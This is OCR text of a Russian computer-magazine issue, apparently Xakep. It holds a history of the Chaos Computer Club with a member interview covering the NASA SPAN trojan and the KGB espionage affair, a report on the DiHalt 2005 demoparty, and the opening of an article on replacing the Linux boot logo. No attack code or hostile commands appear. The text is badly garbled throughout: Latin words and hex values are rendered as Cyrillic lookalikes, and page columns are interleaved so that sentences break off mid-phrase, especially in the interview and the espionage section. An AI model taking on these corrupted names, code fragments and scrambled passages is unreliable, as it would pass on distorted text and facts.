сти банка, деньги тому вернули 
на глазах у прессы. После этого 
случая немцы убедились, нас- 
колько могут быть уязвимыми 
компьютерные системы, и какую 
власть могут иметь технически 
подкованные подростки. История 
с банком передавалась из уст в 
уста, слово «Хаос» долгое время 
ассоциировалось у всех с немецкими хакерами. Благодаря получен- 
ной известности, клуб приобрел многих новых мемберов. 




Карл Кох, мембер Хаоса, погиб- 
ший при невыясненных обстоя- 



[шпионские страсти] На протяжение 80-х гг. клуб постоянно расши- 
рялся. Он был очень известен на европейской хаксцене, а так как Ву с удо- 
вольствием проводил пресс-конференции и рассказывал журналистам о 
своем увлечении, популярность «Хаоса» не угасала. Правда, подобных ха- 
ку ВТХ выходок некоторое время не было, — мемберы занимались свои- 
ми делами и не всегда рассказывали остальным о проведенных взломах. 



ЭКСКЛЮЗИВНОЕ ИНТЕРВЬЮ 

тіпсІѵѵОгк: Есть ли у клуба своя штаб-квартира, насколько 
официальна ваша организация? 

Мемберы (Фрэнк Розенгарт и Энно Лэнзе): Так как 

клуб «Хаос» зарегистрирован официально, у него 
есть свой почтовый ящик, который находится в Гам- 
бурге. Также существует несколько помещений в Бер- 
лине, Дюссельдорфе, Бохуме, Дортмунде, Дрездене и 
других городах — в них проводятся встречи мемберов 
и различные эвенты. Как правило, эти комнаты распо- 
ложены в старых промышленных районах и домиках, 
где можно увидеть кучу компьютерной техники, про- 
водов, ІТ журналов. 

тіпсІѵѵОгк: Как новые люди приходят в клуб? Предъявляете 
ли вы определенные требования к новичкам? 

М: Присоединиться к нам может любой желающий — мы 
не какая-нибудь кооі ІіахОг 1331 сгеѵѵ, мы — клуб :). До- 
статочно получить приглашение от действующего мем- 
бера или просто выразить горячее желание вступить, 
связавшись с нашими представителями. Каждую неделю 
проходит ознакомительный эвент, где новички могут 
познакомиться с нашими задачами и участниками клуба, 
рассказать о себе. О клубе также можно узнать из наше- 



го ежемесячного радио-шоу берлинской радиостанции 
Пасііо Ргі Хт.. Кстати, для того, чтобы участвовать в клуб- 
ных эвентах, не обязательно быть официальным мембе- 
ром — мы открываем двери для всех. В клубе существу- 
ет ежемесячный членский взнос — 6 евро в месяц, эти 
деньги идут в основном на проведение интересных лек- 
ций и покупку девайсов, типа Ріпдегргіпі-сенсоров или 
ВРЮ-ридеров. У мемберов есть кое-какие привилегии. 
Они получают рассылкой клубный печатный журнал Ба- 
ІепзсЫеисіег (приблизительно переводится как «выброс 
информации»), выходящий 4 раза в году, имеют скидки 
на участие в клубных эвентах. 
тіпбѵѵОгк: Насколько силен уровень знаний мемберов 
клуба «Хаос»? 

М: Уровень очень разный. Некоторые испытывают про- 
блемы с подключением мышки, другие — пишут опера- 
ционные системы. Компьютерная безопасность — лишь 
небольшая часть нашей деятельности. Мы участвуем в 
разных культурных (скорее гиковых) мероприятиях, бо- 
ремся за права человека, особенно право на личную 
жизнь. Что касается безопасности... у клуба много хоро- 
ших друзей, являющихся экспертами в компьютерах, ко- 
торые с удовольствием помогают в наших проектах. 
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световое шоу в честь двадцатилетия 



Летом 1987 г. мемберы Хаоса решили узнать, сколько 
компов реально хакнуть в сети 5РАЫ аэрокосмического 
агентства ЫА5А. Для этого был написан специальный 
троян под ОС ѴМ5, который удалось внедрить в исход- 
ник новой версии 4.5. Программка собирала пароли 
всех компьютеров, обращавшихся к сети и, поскольку 
таких было не так уж и много, у хакеров в руках вскоре 
оказался ключ к ЗРАІЧ. 

О взломе стало известно, вокруг Хаоса снова разразилась шу- 
миха. Но хакеры ничего в сети не меняли, не удаляли, да и вооб- 
ще пробыли там недолго, так что тяжелых последствий не было. 

Но самым нашумевшим эпизодом в истории клуба была 
шпионская заварушка вокруг мемберов клуба: Питера Карла, Маркуса 
Хесса, Карла Коха, Пенго и Доба. Проект, который сплотил этих ребят, 
носил название «Эквалайзер». Хакеры попросту решили заработать 
быстрые деньги на своих умениях. В качестве товара выступала укра- 
денная информация о новейших достижениях и разработках европей- 
цев, в качестве покупателя — КГБ. Каждый из участников проекта 
имел знания в какой-нибудь области. Карл умел убеждать людей, Хесс 
специализировался на системах ІІІМІХ, Доб ломал мейнфреймы Зіе- 
тепз, Пенго и Кох могли проникнуть в любую систему и неплохо про- 
граммировали. Сотрудничество с русской разведкой длилось недолго. 
Хакерам хотелось больше денег, а КГБ — более секретной информа- 
ции, обе стороны никак не могли найти компромисс между важностью 
инфы и ее стоимостью. Впрочем, агент КГБ по имени Сергей, через ко- 
торого была налажена связь, успел передать немецким хакерам около 
45 тысяч долларов. Но как оказалось позже, многие документы, про- 




клубный журнал ОаІепзсЫеисІег 



[клуб Хаоса сегодня] Официальный ГАО 
на сайте Шр://ссс.сІе называет компьютерный 
клуб «Хаос» галактическим сообществом лю- 
дей всех возрастов, полов, рас и социальных 
положений. Цели и задачи клуба со временем 
немного изменились. Если раньше он больше 
имел политическую направленность, теперь в 
основе лежит изучение и обучение масс ком- 
пьютерной безопасности, способам уберечь 
свою личную жизнь от посторонних глаз, соз- 
дание платформы для свободного общения 
или обмена информацией. Хаос не является чисто хакерской органи- 
зацией, но большая часть мемберов технически хорошо подкована. 
Некоторые из них публикуют результаты своих зесигііу-исследований 
в Сети, проводят встречи и эвенты, совместно участвуют в крупных 
проектах. На данный момент в клубе более 1500 человек. 

В интернете не так много информации о внутренней жизни Хаоса, а та, 
что есть, — в основном на немецком языке. Поэтому я связался с парой 
активных мемберов и попросил их рассказать о старейшем хак-клубе. 

[конференция Хаоса] Основным эвентом клуба является ежегодная 
Конференция Хаоса (СИаоз Соттипісаііоп Сопдгезз). Это мероприятие старто- 
вало в далеком 1984 г., проводилось сначала в Гамбурге, а с 1988 г. — в Бер- 
лине. Последние пару лет ССС открывает двери с 27 по 29 декабря, и, 
похоже, организаторы собираются сделать эту дату постоянной. 

Ву Холланд очень ответственно подошел к организации первых кон- 




ССС на стене Наиз без І_еНгегз 



лым преступлением, 
и к концу 80-х участ- 
ники «Эквалайзера» 
стали задумываться о 
последствиях. 

В конце концов, Карл 
Кох и Пенго, по сове- 
ту адвокатов, яви- 
лись в органы с доб- 
ровольным признанием. Для Коха это закон- 
чилось печально — незадолго до суда (в ян- 
варе 1990 г.) его нашли сожженным в лесу, 
следствию так и не удалось узнать обстоя- 
тельства смерти. Пенго свидетельствовал 
против товарищей в суде и был единствен- 
ным, кто выбрался сухим из воды. 



данные хакерами, ле- 
жали в свободном до- 
ступе и, по сути, ниче- 
го не стоили. Тем не 
менее, сам факт со- 
трудничества с рус- 
скими являлся тяже- 



тіпсІѵѵОгк: Как бы ты описал инфраструктуру клуба? Суще- — Не поощряй бюрократию, продвигай децентрализацию, 

ствуют ли обязанности у официальных участников? Каким — Хакеров должны судить по их знаниям и поступкам, а 

образом ваши ребята общаются между собой? не таким надуманным критериям, как образование, воз- 

М: Хаос сам по себе не представляет инфраструктуру. Она раст, раса и положение в обществе, 
дает фундамент для ее строительства участниками клуба. — С помощью компьютера можно создавать искусство и 
Обычно происходит все так — один из мемберов начинает красоту. 

вести, к примеру, мейллист. Рассылка оказывается инте- — Компьютеры могут изменить твою жизнь к лучшему, 

ресна другим, и люди принимают участие в ее поддержке. — Не засоряй чужие информационные источники. 

Клуб «Хаос» максимально децентрализован — каждый за- — Делай информацию доступной, защищай свои приват- 
нимается своими делами, но в итоге получается большое ные данные от бюрократов. 

и интересное комьюнити. В рамках клуба существуют так тіпсІѵѵОгк: Поддерживает ли клуб «Хаос» контакты с други- 

называемые Еііаз — региональные тусовки членов, орга- ми хакерскими организациями? 

низованные для проведения риалайфовых встреч и обме- М: Конечно. Прошлым летом, например, мы тусовались на 

на опытом. Всего их 8. Организацией крупных клубных природе с нашими друзьями из Дании. Те из нас, кто 

эвентов занимается круг лиц известный как ІІтЬгеІІа. серьезно занимается изучением компьютерной безопасно- 

Все это вместе обеспечивает дружескую атмосферу и под- сти, имеют множество знакомых в международном зесигйу 

талкивает к начинанию интересных проектов. Сабо собой, комьюнити. Что касается клуба в целом — Хаос входит в 

все эти проекты легальны. состав крупной организации по защите электронных прав 

тіпсІѵѵОгк: Я слышал клуб Хаоса поддерживает принципы ЕйВІ (Еигореап 0\д\\а\ Відіііз), почитать о которой можно 
хакерской этики. Что это за принципы? на шѵѵѵѵ.есігі.огд. 

М: — Доступ к компьютерам, и ко всему, что может по- тіпсІѵѵОгк: Какие были наиболее известные хаки мемберов Хаоса, 

мочь тебе понять, как работает мир вокруг, должен быть М: Хмм... из самых нашумевших: заварушка с КГБ, кло- 

свободным и неограниченным. нирование О ЗМ- карты, создание «новых» отпечатков 

— Любая информация должна быть бесплатной. пальцев и т.д. 









ферѳнций. Было выбрано про- 
сторное помещение, приготовле- 
ны матрасы для уставших хаке- 
ров, были даже установлены ме- 
таллодетекторы и поставлена ох- 
рана, чтобы власти не смогли 
прервать мероприятие. 

В середине 80-х хакерские тусов- 
ки были большой редкостью. Для 
прессы Конференция Хаоса стала 
пищей для сенсационных репор- 
тажей, поэтому на второй клуб- 





СНаоз Соттипісаііоп Сатр 2003 



ный эвент съехались журналисты, телевизионщики, киношники и со- 
циологи со всех концов Германии. Их было чуть ли не больше, чем са- 
мих хакеров. Мемберы клуба и приглашенные гости добровольно чи- 
тали лекции, делились некоторыми своими трюками по обходу защи- 
ты систем, соревновались в реалтаймовом хакинге. Например, в тот 
день хакерам удалось проникнуть на компьютер полиции Оттавы. 
Конференция Хаоса росла с развитием самого клуба. С каждым го- 
дом ее посещало все больше человек, теперь число посетителей со- 
ставляет около 3.5 тысяч. В стремлении улучшить эвент, Ву никогда 
не гонялся за «профессиональными» пати, типа Дефкона. Вместо 
этого он старался сделать все, чтобы условия и атмосфера внутри 
стали еще более дружелюбными. 

В рамках конференции проходят реаллайфовые встречи других орга- 
низаций и клубов. Например, ежегодно здесь встречаются авторы из- 
вестной онлайновой энциклопедии ѴѴікіресІіа, ѴЛ комьюнити, группы 
опенсорсных разработчиков, типа ОІМР. Специально приглашенные 





официальный сайг клуба 



гости из Израиля, США, Австра- 
лии и других стран читают лекции 
на самые разные темы, от взлома 
тЬесІсІесІ-систем до развитости 
СМИ в Иране. 

Самым оживленным и интересным 
местом на ССС является «Хак- 
центр» — огромное помещение, 
где любой желающий может под- 
ключить свой компьютер к локаль- 
ной сети, и где царит та самая тус- 
овочная атмосфера. 

20-летний юбилей ССС, участни- 
ки клуба отметили световым шоу 



ВІіпкепІідПІз ( ѵѵѵѵѵѵ.ЫіпкепІідЫз.сІе ) на стене берлинского здания Наиз 
без І_еИгегз. Запрограммировав попеременное переключение света в 
окнах, хакеры выводили разные картинки и анимацию. Матрица раз- 
мером 18 на 8 позволяла даже демонстрировать небольшие фильмы. 
Шоу было хорошо видно издалека, и проезжающие или проходящие 
люди могли не только насладиться зрелищем, но и поучаствовать в 
нем. Поиграть на стене дома в старый-добрый Ропд или с мобильни- 
ка, отослав на специальный номер текст, который транслировался 
скроллингом на стене здания. 

Помимо СПаоз Соттипісаііоп Сопдгезз клуб Хаос проводит ежегод- 
ный СИаоз Соттипісаііоп Сатр — летний эвент, являющийся, по 
сути, пикником для хакеров, с палатками, шашлыками и хакингом 
под открытым небом. Проходит он поочередно в Германии и Нидер- 
ландах, и отзывы о каждом таком событии у хакеров исключитель- 
но положительные © 
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тіпсІѵѵОгк: А кого ты можешь выделить из мемберов? По 
уровню знаний или вкладу в развитие клуба. 

М: Конечно, это Ву Холланд и Стеффен Вернери — осно- 
ватели клуба. Кроме них: Ѵіс, инспектировавший оружие в 
Ираке, наш главный оратор и пресс-секретарь Энди Мюл- 
лер-Магун, Тим Притлав, организовавший множество 
клубных эвентов, Наедаг, который занимается поддерж- 
кой базы данных о мемберах и ведет кучу бумажных дел, 
Расіеіиип — наш главный защитник безопасности. Из про- 
шлого: Карл Кох и Трон — оба активно занимались ком- 
пьютерным взломом и погибли при нераскрытых обстоя- 
тельствах. Трон был замешан во взломе смарткарт и стал 
первым, кому удалось хакнуть немецкие таксофоны с по- 
мощью клонирования карт. 

тіпсІѵѵОгк: Расскажи о Ву Холланде. Насколько хорошо ты 
его знал, и что это был за человек? 

М: С Ву я встречался довольно часто, хотя не могу себя 
отнести к его близким друзьям. Меня всегда поражала 
креативность его мышления. Ву был очень дружелюб- 
ным, веселым, знал много технических подробностей из 
мира ІТ, но, что самое главное, любил и умел рассказы- 
вать забавные истории. Когда он начинал говорить, все 
вокруг затихали, потому что знали — его рассказ будет 
интересным. Ву был одной из центральных фигур сцены. 



Все его знали, и, так как у него всегда имелись свежие 
оригинальные идеи, многие его считали провидцем ІТ. 

Он находил хорошее решение для любых вопросов. По- 
следними его проектами при жизни были обучение сту- 
дентов поддержке университетских компьютеров и со- 
циальному хакингу. 

тіпсІѵѵОгк: В чем Ву больше всего повлиял на клуб? 

М: Этот человек вел за собой клуб по пути хакерской эти- 
ки, которой был предан всю жизнь. Благодаря ему, Хаос 
стал не просто очередным клубом, а сообществом людей, 
умеющих думать нестандартно. После его смерти в июле 
2001 г., клуб сохранил хорошую репутацию. Не могу ска- 
зать, изменилось ли что-то с уходом Ву, но нам однознач- 
но его не хватает. 

тіпсІѵѵОгк: Каким ты видишь будущее клуба «Хаос»? 

М: Наши хорошие отношения с обществом и политиками 
могут дать нам больше влияния. В то же время придется 
больше думать об организации, так как уже сейчас так 
много мемберов с непохожим мышлением. Одним хо- 
чется тесного андеграунда, другим — большого публич- 
ного комьюнити, одни любят правительство, другие его 
ненавидят. Скорее всего, клуб со временем станет ско- 
плением большого количества разных глупп, объединен- 
ных под одним лейблом. 
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РіНаІі глазами 
организатора 

С САМОГО ПЕРВОГО ВЫПУСКА «СЦЕНЫ», 

Я СТАРАЛСЯ РАССКАЗАТЬ ТЕБЕ ПРО САМЫЕ 
КРУПНЫЕ И ИЗВЕСТНЫЕ КОМПЬЮТЕРНЫЕ 
ТУСОВКИ. ОЕРСОІМ, А38ЕМВІ_Ѵ, ЭВЕАМНАСК... 
НА ЭТИ ПАТИ СЪЕЗЖАЮТСЯ ДЕСЯТКИ ТЫСЯЧ 
ЛЮДЕЙ, И КАЖДАЯ ИЗ НИХ ЯВЛЯЕТСЯ МИРО- 
ВЫМ СОБЫТИЕМ. НО, НАРЯДУ С КРУПНЫМИ 
КОНФЕРЕНЦИЯМИ, СУЩЕСТВУЮТ ВСТРЕЧИ 
МЕНЬШЕГО МАСШТАБА. О НИХ ЗНАЮТ НЕМ- 
НОГИЕ, НО ЭТО НЕ МЕШАЕТ ПОСЕТИТЕЛЯМ 
ВЕСЕЛО ПОТУСИТЬ И ПОЛУЧИТЬ СВОЮ 
ДОЛЮ ФАНА. НА ЭТОТ РАЗ РАССКАЗ БУДЕТ 
ИМЕННО О ТАКОЙ ПАТИ, ПРОШЕДШЕЙ 
13 АВГУСТА В ГОРОДЕ ДЗЕРЖИНСКЕ 
И НОСЯЩЕЙ ИМЯ ОІНАІ.Т. О ТОМ, КАК ВСЕ 
ПРОШЛО, РАССКАЖЕТ ГЛАВНЫЙ ОРГАНИЗА- 
ТОР ѴІШІМѴ I Влад Виноградов (ѵіпппу@арог1ги) 

Маленькая демопати в 
большом Новгороде 

[День первый] Нижний Новгород, 13 августа. 
Проснулся я рано — в 6:30 утра. Погода обеща- 
ла быть теплой, безоблачной. Поднявшись сам, я 
стал поднимать ЕтР (Екатеринбург) и Ѵоѵапіиз 
(Москва), приехавших накануне и ночевавших у 
меня. После долгих безуспешных попыток, рас- 
шевелить спящие тела, пришлось 
вооружиться холодной водой. За- 
пах сосисок с сыром и помидорами 
стал убедительным аргументом. 

Побросав в багажник машины 
свои рюкзаки, мы отправились за 
ЗсТ, приехавшим из Симферополя 
еще несколько дней назад и оста- 
новившимся у своих родственни- 
ков. Нужно было торопиться, так 



как к 8 утра в Дзержинске на железнодорожном вокзале нас ждали при- 
бывшие Зітоп & АІТТ из небезызвестной группы СРІІ, а также 4аІс из Пи- 
тера. Это не просто помощь приезжим в незнакомый город, а уже тра- 
диция — собираться на вокзале и организованными кучками добирать- 
ся до места проведения фестиваля. В этом году 0\Иа\\ должен был про- 
ходить в помещении кинотеатра «Спутник». 

Всю последнюю неделю мы готовились к проведению демопати. Догова- 
ривались с администрацией кинотеатра, распределяли роли, искали 
необходимое оборудование, продумывали запасные варианты на слу- 
чай, если что-то пойдет не так. В итоге мы собрали несколько компью- 
теров: два РС, АтідабОО, Атіда1200, Редазоз2 и РепІадоп128. На вся- 
кий случай, под рукой имелись эмуляторы. Работа по организации 0\Иа\\ 
кипела каждый день до самого открытия. 

Итак, доставив народ к кинотеатру, мы еще раз проверили все оборудо- 
вание и потихоньку начинали регистрировать гостей. На официальном 
сайте демопати в регистрационном разделе отметилось много людей, 
но приехали далеко не все. Там среди посетителей можно было найти 
сценеров из разных регионов России и Украины. Всего около 50 чело- 
век, так что ОіНаІІ больше походил на локальное пати. Примерно столь- 
ко же было и конкурсных работ. 

Публика проходила в зал, рассаживалась по местам и попадала в мир 
демосцены. Несмотря на то, что мы отбились от графика на 20 минут, 
публика в зале не скучала — на большом экране кинотеатра крутили по 
очереди лучшие демки прошлых лет. 

После вступительных слов организатора, ОіНаІІ был официально 
объявлен открытым, и практически сразу началась демонстрация ра- 
бот первого конкурса — 2Х-5рес1гшп графика. Из показанного мне 
понравилось изображение лица девушки, стоящей где-то на пустын- 
ном откосе на фоне маяка. Как бывшему спектрумисту, мне понятна 
сложность рисования на Спектруме — всего одно графическое раз- 
решение и серьезные ограничения с палитрой. Поэтому мысленно 
аплодировал автору за его терпение. 

Далее был конкурс многоканальной традиционной музыки на 
РС/Атіда. Из массы работ выделялись две. Первая была написа- 
на в спокойном стиле, типа этнической баллады, во второй узна- 
вался ремикс трека из известной демки І_уга. После музыкально- 
го компо должно было пройти 2Х-ІПІГО, но работ никто не предо- 
ставил, и было решено провести конкурс на свежем воздухе. А 
именно — метание жестких дисков. В двух шагах от кинотеатра 
находился стадион, и сценеры, разобрав специально пригото- 
вленные для них винчестеры, направились к месту проведения. 
Забавно было наблюдать, как при выборе І-ЮО одни искали потя- 
желее, другие — полегче, хотя все они были одинаковыми. Же- 
лающих поучаствовать набралось немного — около 25 человек, 
остальные видимо отошли перекусить. 

После запуска винчей в небо, сразу стало очевидно, кто победил. Ребят 
наградили пакетами подключения к сотовой сети от ТеІе2 и призами от 
Соса-Соіа. Один чувак 
умудрился с места мет- 
нуть жесткий диск на 
35 метров. Если тебя 
это не впечатляет — 
вынь из компа свой 
винт и попробуй сам. 

Узнав, что он стал побе- 
дителем, метатель ди- 
сков решил переплю- 
нуть самого себя, а 
так как винчей рядом 
не оказалось, достал 
мобильник и с разма- 
ха швырнул в небо. 

Телефон пролетел, на- 
верное, метров 50 и 
после приземления ра- 
скололся на 3 части. 

Удивительно, но когда 




организаторы за работой 





плакат с приглашением на пати щ настройка железа 








его собрали — работал он как новенький. Вот вам и Моіогоіа. 

После конкурса дискометателей и сытного обеда, ор- 
ганизаторы продолжали разогревать публику, показы- 
вая лучшие демки прошлых лет. Через несколько ми- 
нут начался конкурс Ргеезіуіе (ЗгарЫсз (свободная 
графика). На мой взгляд, это самый простой графиче- 
ский конкурс. Взял кусок от одной фотографии, при- 
клеил к нему кусок от другой, где надо — профильтро- 
вал, заблюрил — готово! Несмотря на кажущуюся про- 
стоту, работ было представлено немного, а те, что бы- 
ли, оригинальностью не отличались. Первое место за- 
няла фотка какого-то чела, чем-то похожего на марси- 
анина, и едва обработанная в фотошопе. Прокрутив 
еще несколько демок, мы запустили конкурс ѴѴіІсІ/Апі- 
таііоп. На него можно выставлять любые работы, не 
подходящие по требованиям к другим объявленным 
конкурсам. Наибольшей популярностью здесь пользу- 
ются различные видеоролики. Обычно сценерские ви- 
деосюжеты делятся на два основных направления — 
смешные и депрессивные. Так было и в этот раз. Са- 
мыми интересными оказались «Депресняк» от 
КегпНегЬзЦ по оформлению напоминающий триллеры 
Звонок1&2, и забавные видео-ролики от Еуе-0 & К л 2, 
один из которых был очень похож на известное обра- 
щение Жириновского к Бушу. Также была интересная, 
но короткая анимация от группы СРІІ — своеобразные 
воспоминания о школьной жизни. На экране — коридор, школь- 
ный класс, паркет, обшарпанные стены... и почему-то полумрак. 
Далее прошло еще одно Іип-сотро под названием Соса-Соіа сігіпк! 
Шесть желающих поднялись на сцену для того, чтобы на время вы- 
пить литровую бутылку Колы. Победителю понадобилось около 3-х 
минут, чтобы осушить тару. После этого конкурса долгое время по 
всему залу доносились звуки, прошу прощения, отрыжки. После не- 
большого перерыва начался конкурс АѴ-музыки на Спектруме. Со- 
временным музыкантам трехканальная музыка с синтезированными 



сэмплами покажется писклявой и противной. Но лет 10 назад, когда 
на РС еще не появился Соѵох и 0115, все от этого балдели и счита- 
ли чуть ли не наивысшим прогрессом. Недавно на спектруме появи- 
лась двухпроцессорная музыкальная карта ТигЬоЗоипсІ, сделавшая 
звук 6-канальным, но по-прежнему, с синтезированными сэмплами. 
Вернемся к конкурсу. Было всего 2 музыкальных модуля, поэтому я 
решил остаться их прослушать, хотя обычно музыкальные компо иг- 
норирую. В общем-то работами остался доволен — оба модуля ока- 
зались довольно динамичными и оригинальными. В завершении дня 




общение сценеров 



коллективное фото гостей 



открытие ОіНаІІ 2005. На сцене главный организатор Ѵіппу 
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конкурс на скоростное выпивание 



зал, где проходил ОіИаІІ 



конкурс по метанию дисков 



состоялось 7.Х Оегтю сотро, на 
которое была выставлена всего 
одна работа от СРІІ. Она чем-то 
напомнила мне их же демку, вы- 
ставленную двумя неделями ра- 
нее на финской АззетЫу. Тот же 
движок, те же эффекты. Озвучка 
демы была странной: в двух ка- 
налах звучал какой-то мусор, в 
третьем — бумкали ударные. Но 
авторы заверили, что так и дол- 
жно быть. Первый день пати, на- 
конец, закончился. Уставший, но 
довольный, народ стал потихоньку расходиться. Я вместе с 4аІс, Ѵо- 
ѵапіиз, ЗсІ и ЕтР поехал ночевать домой в Нижний Новгород. На- 
шлись и те, кто хотел продолжения шоу, — они отправились купать- 
ся и отдыхать (пьянствовать) на Святое Озеро. 

[День второй] Утро 14 августа. Светит солнышко, погода опять не 
подводит. Когда мы добрались до кинотеатра, там уже толпился, 
знакомый по первому дню, народ. Некоторые были с помятыми ли- 
цами после вчерашнего веселья :-). Оставив сценеров обсуждать 
вчерашнее, я прошел в зал и вместе с другими организаторами про- 
верил оборудование. За прошедшую ночь мы получили еще одну 
конкурсную работу на СО. Видимо, менталитет у нас такой — все де- 
лать в последний день :-). 

Двери открылись, люди стали рассаживаться по местам. Подведя 
итоги первого дня и прокрутив еще несколько известных демок, мы 
начали конкурс Атіда/РС Вепбег (ЗгарЫсз. Мне понравилось изобра- 
жение Формулы-1, довольно качественно сделано. Хотя к моему 
удивлению, первое место заняла картинка «Утро следующего дня», с 
пустыми бутылками и банкой из под шпрот на фоне кухни. Очевидно, 
тема голосовавшим близка. 

В следующем конкурсе многоканальной альтернативной музыки, мне 
толком ничего не понравилось, хотя, признаюсь, в этом музыкальном 
направлении я ничего не понимаю. 

После успеха ПбсИИгоѵѵіпд сотро, мы решили его повторить, но те- 
перь с разбега. Чемпионом оказался все тот же парнишка (РгосН), 



увеличивший собственный рекорд на 5 метров. А узнав о победе, 
опять швырнул в небо свой многострадальный мобильник. Символи- 
ческим призом был награжден и самый слабый участник, которым 
оказалась милая девушка с ником Ігѵга. 

Когда закончился перерыв на обед, настало время МРЗ/ООО-музы- 
ки. Довольно насыщенный конкурс, хотя большую часть работ я 
пропустил из-за общения с приехавшими телевизионщиками. Пер- 
вое место по праву заняла ритмичная композиция от местного ди- 
джея 03 Розіег. Еще запомнился трек казанских сценеров, записав- 
ших его, используя лишь свои голоса, звуки рук, губ, микрофона и 
прочего, без участия реальных музыкальных инструментов. Чтобы 
народ не скучал, на большом экране все время показывали картин- 
ки известных сценовых художников. 

Когда в очередной раз, проходя мимо охранника на входе, я уви- 
дел, как он рисует фломастером на бумаге, у меня в голове появи- 
лась идея риалтаймового конкурса художников. Тем более, на 
экране в это время показывали Напбсігаѵѵ (ЗгарЫсз сотро, или, как 
его называют, РіхеІ Агі. Вызвав на сцену четверых смельчаков, мы 
вооружили их всем необходимым, предоставили произвольную те- 
му для творчества и выделили 20 минут. По истечении этого вре- 
мени, на экране продемонстрировали результаты. Кто-то проил- 
люстрировал свои ночные приключения в Дзержинске, кто-то экс- 
периментировал на тему ОіНАІ_Т 2005. С небольшим отрывом победи- 
ла работа с изображением барашка, а лично мне понравилась 
картина с двумя влюбленными на вершине горы. У каждого из них 
было всего по одному крылу за спиной, символизируя тем самым 
неразрывность чувств. 

К вечеру прошло еще два конкурса: СИір Типез и А5СІІ графика, в каж- 
дом было по одной работе. Жаль. На десерт оставался самое сложное 
и ожидаемое компо — Атіда/РС бето. И опять же в наличии была толь- 
ко одна работа на Атіда, причем написанная на бейсике! А я то думал, 
что времена бейсика уже давно прошли... 

Закрытие ОіНаІІ знаменовалось награждением победителей и вручени- 
ем дипломов, призов и денежных премий. 

В целом, на мой взгляд, пати прошло довольно успешно и гладко, не 
считая мелких накладок (как же без них?). Конечно, хотелось бы в сле- 
дующем году и посетителей, и работ еще больше. И надеюсь, что ОіНаІІ 
2006 тоже никого не разочарует 0 
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Пингвин 

на операционном 
столе 

КОМУ НЕ ХОТЕЛОСЬ ХАКНУТЬ ЯДРО І_ІШХ? 
КАЖДЫЙ УВАЖАЮЩИЙ СЕБЯ ЛИНУКСОИД 
ДОЛЖЕН ПОПРОБОВАТЬ ЭТО СДЕЛАТЬ! ВЕДЬ 
ЫІЧІІХ, В ОТЛИЧИЕ ОТ ѴѴІІ\ЮОѴѴЗ, НАСТОЯЩИЙ 
ПОЛИГОН ДЛЯ ХАКЕРСТВА, ТАЯЩИЙ В СЕБЕ 
НЕОЖИДАННЫЕ ВОЗМОЖНОСТИ. ВЗЯТЬ, ХО- 
ТЯ БЫ ЛОГО, ПОЯВЛЯЮЩЕЕСЯ НА ЭКРАНЕ. 
ПРИШЛА ПОРА ИЗМЕНИТЬ ЕГО ПО СВОЕМУ 

ВКУСУ I Крис Касперски ака мыщъх 



Модифицируем 
стандартный 
логотип І_іпих 



[іпіго] «Хаками» (Гіаскз) называются всякие хит- 
рости, забавные шутки и оригинальные приемы, 
тогда как под «хакерством» (Гіаскіпд) традицион- 
но понимается взлом программ или сетевые ата- 
ки. Вроде похожие термины, а какая разница! Эта 
статья открывает цикл публикаций, рассказыва- 
ющих о том, что крутого можно сделать с ядром 
І_іпих. И начнем с простой задачки — изменение 
логотипа при загрузке операционной системы. 



[меняем лого] Обычно при загрузке І_іпих появляется характерный 
пингвин, которым уже никого не удивишь, и который уже довольно силь- 
но поднадоел. Хочется чего-нибудь новенького. Как изменить стандарт- 
ное лого на что-то свое? Есть несколько путей. 

Начнем с компиляции ядра. За отображение лого ответственны следую- 
щие файлы: /изг/згс/ііпих/сігіѵегз/ѵісіео/* и /изг/згс/Ііп их/іпсіисіе/ііп их/ 
Ііпих_Іодо.Гі. Всякий раз, когда ядро загружается в отладочном (беЬид) 
или молчаливом (циіеі) режиме, эти файлы (конечно же, в откомпилиро- 
ванном виде) получают управление и выводят изображение на экран. Са- 
мо лого обитает в файле Ііпих_Іодо.Гі, где оно хранится в виде обыкновен- 
ного массива данных, кусочек которого для наглядности приведен ниже. 

[фрагмент файла Ііпих_Іодо.Іі, содержащий Іодо] 

ипзідпесі сііаг Мпих_1одо_Ь\л/[] іпіісіаіа = { 

ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, 

ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, 0x80, 0x00, ОхЗР, 

ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, 0x1 Р, 

ОхРЕ, 0x1 Р, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, ОхРР, 

ОхРЕ, ОхЗР, ОхРР, 0х0Р, ОхРР, ОхРР, ОхРР, ОхРР, 

ОхРР, ОхРР, ОхРЕ, 0х7Р, ОхРР, 0хС7, ОхРР, ОхРР, 

Изменять его можно как вручную, так и автоматически. Ручной режим 
мы трогать не будем, поскольку ничего интересного в нем нет (сплош- 
ная рутина), гораздо проще запустить специальную утилиту — она все 
сделает сама. В отличие от мира ѴѴіпбоѵѵз, погруженного в корпоратив- 
ный мрак, в котором бродят зубастые монстры, под І_іпих народ исход- 
ники не зажимает, и мы можем легко проанализировать, что делает та 
или иная программа, и нужно ли это нам. Не стоит забывать, что вмеша- 
тельство в ядро всегда чревато фатальными последствиями. Один не- 
верный шаг — и система отказывается загружаться или уничтожает все 
данные жесткого диска под чистую. Поэтому перед всякой установкой 
потенциально небезопасной программы необходимо пролистать ее ис- 
ходный текст и посмотреть, какие именно файлы она изменяет. Остает- 
ся только зарезервировать их на дискету, болванку или флешку, а заг- 
рузиться всегда можно с І_іѵе СО. 

Мы будем использовать утилиту Іодо, которую можно скачать с демок- 
ратичного бельгийского сервера: тетЬегз.сІіеІІо.Ье/сг26864/ипих/ 
Ыеѵ/Іодо.Іаг.Ь^2. Распаковав архив, мы обнаружим три Си-файла и 
один такеіііе. Двоичных файлов, увы, нет, и их приходится компилиро- 
вать самостоятельно. Поддерживаются две версии ядер — с номерами 
2.2 и 2.4. Для версии 2.6 нужен особый подход, о котором мы чуть поз- 
же и поговорим, а пока вернемся к нашей текущей задаче. 

Анализ показывает, что утилита Іодо фактически состоит из двух 





стандартное лого 



видоизмененное лого 



нестандартное АЗСІІ-лого 



частей: конвертора входного изображения, который находится в 
файле рптіоіодо.с, и непосредственно самого патчера ядра, сосре- 
доточенного в файлах Іодо_2_2.с и Іодо_2_4.с (каждый для своей 
версии ядра). Строго говоря, Іодо_2_4.с включает в себя экстрактор 
текущего лого и патчер, а Іодо_2_2.с только экстрактор лого старого 
формата, но это уже детали. Само же Іодо в обоих случаях представ- 
